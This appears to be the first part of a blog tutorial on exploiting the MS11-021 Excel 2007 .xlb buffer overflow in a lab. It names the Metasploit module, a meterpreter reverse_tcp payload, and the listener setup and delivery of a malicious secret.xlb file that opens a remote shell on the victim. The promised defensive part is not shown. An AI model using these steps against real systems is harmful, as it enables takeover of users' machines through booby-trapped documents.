I am writing this article into 2 parts, In 1st part i will show you how to exploit MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Vulnerability in windows with Metasploit Express Edition and In 2nd part i will show you how to prevent exploitation of MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Vulnerability in windows with Symantec Critical System Protection (SCSP).
MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow
This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine, and the number of bytes to copy, therefore causing a stack- based buffer overflow. This results aribrary code execution under the context of user the user.
Exploitation of MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow
1. Our Victim is using windows xp professional SP2 (192.168.42.71) and Microsoft Office 2007 is installed on Victim Machine.
2. I am using Backtrack 5 R1 as Attacker machine and its IP Address is 192.168.42.62
3. I am using windows/fileformat/ms11_021_xlb_bof metasploit module to exploit Microsoft Office 2007 Excel .xlb Buffer Overflow Vulnerability (use exploit/windows/fileformat/ms11_021_xlb_bof).
4. To view available option run show options command, I have to set the filename (set filename secret.xlb)
5. I am using windows/meterpreter/reverse_tcp payload.
6. Now i have to enter LHOST (Local Host) i.e 192.168.42.62 (Attacker Machine IP Address). Write exploit and Hit Enter. It creates a file name secret.xlb
7. Before sending the secret.xlb file to Victim, I have to set up a listener to grab connection.
8) I am using multi-handler exploit with windows/meterpreter/reverse_tcp payload. set lhost(Attacker Machine IP address) and lport (Attacker Macine Port no), write exploit and hit enter, then listner is started on Attacker Machine.
9) I send secret.xlb file to our victim.
10) when our victim tries to open secret.xlb file with Excel, Our exploit will execute on his machine and give shell to the attacker machine.
11) I successfully got the meterpreter shell of Our victim machine.
12) Let's type ipconfig command to verify Whether we enter into victim machine or not.
So I successfully entered into the Victim machine and get the meterpreter shell of victim machine. In next part i will show you how to prevent exploitation of MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Vulnerability in windows with Symantec Critical System Protection (SCSP).